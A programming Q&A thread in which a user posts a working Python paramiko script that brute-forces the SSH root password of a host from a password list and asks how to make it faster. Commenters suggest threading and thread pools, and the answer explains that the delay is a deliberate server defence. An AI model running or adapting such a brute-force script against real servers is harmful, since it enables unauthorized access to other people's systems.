# Python 3 Brute force, paramiko ssh connect fail too much time

Tags: python, time, ssh, connect, paramiko

I am currently codding my first brute force script with python and i had a problem.
When I try connect to my ssh server with a false password, it takes rougly 2 seconds to fail.
When I try to connect to my ssh server with the real password, it instantly accepts it.
So the problem is that when i brute force my test ssh server, it takes 2 second to verify each password... How can i decrease this extra large answer time ?

```
import paramiko;
import socket;
import time;

check = time.time();

s = paramiko.SSHClient();
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.load_system_host_keys();

host = input("Please enter the host IP: ");

with open(input("Please enter the password file: "), "r") as passwdFile:
    for line in passwdFile:
        password = line.strip("\r\n");
        try:
            s.connect(host, port=22, username="root", password=str(password), timeout=1, allow_agent=False, look_for_keys=False);

            print();
            print(" ************************* ");
            print("The correct password is : " + password);
            print(" ************************* ");
            exit(0);
        except paramiko.AuthenticationException as e:
            print(" [!] Incorrect password: " + password + "  [" + str(time.time() - check) + "s]");
        except socket.error as e:
            print(str(e));
        check = time.time();
```

Comment: The server is doing that on purpose. Of course, you can run multiple attempts in parallel with threading. Now I'm curious how well the ssh server handles that!

Comment: As an aside, take those semicolons out. It causes skin rashes and uncontrolled outbursts with most python programmers.

Comment: Of course, unless the server is configured naively, that won't work either. If you try using something like Tor to get a different IP every time, you'd probably just DDoS the SSH server, while not having any kind of useful password/s rate.

Comment: @tdelaney This is a little off topic but not so much, since it belongs to the answer as well... In order to avoid those 2 seconds timeout from the incorrect password, we can decrease the timeout time using the `timeout` argument that Paramiko has it. But, my off-topic content is: When using Threading, can I set a limit of proccess? So my own app does not become too much heavy.

Comment: @RaulChiarella - Yes. Your code would be creating the threads and you could put a limit on how many. One option is to use a thread pool where you define X number of threads in advance. Call the pool's async_apply and wait on the result. Make sure you don't have more outstanding requests than threads in the pool.

Answer (score 3):

You can't. This is set via server configuration, and its purpose is specifically to combat the kind of SSH brute force attack that you're trying to do.

It's a bit of darwinian irony- the kind of servers that this would work on don't exist because they're eaten alive the moment they are exposed to public traffic